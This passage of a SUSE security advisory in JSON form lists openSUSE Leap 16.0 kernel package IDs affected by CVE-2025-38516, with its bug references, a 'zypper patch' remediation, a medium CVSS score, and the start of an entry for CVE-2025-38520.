"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38516",
"url": "https://www.suse.com/security/cve/CVE-2025-38516"
},
{
"category": "external",
"summary": "SUSE Bug 1248209 for CVE-2025-38516",
"url": "https://bugzilla.suse.com/1248209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38516"
},
{
"cve": "CVE-2025-38520",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38520"
}
],
"notes": [
{
"category": "general",
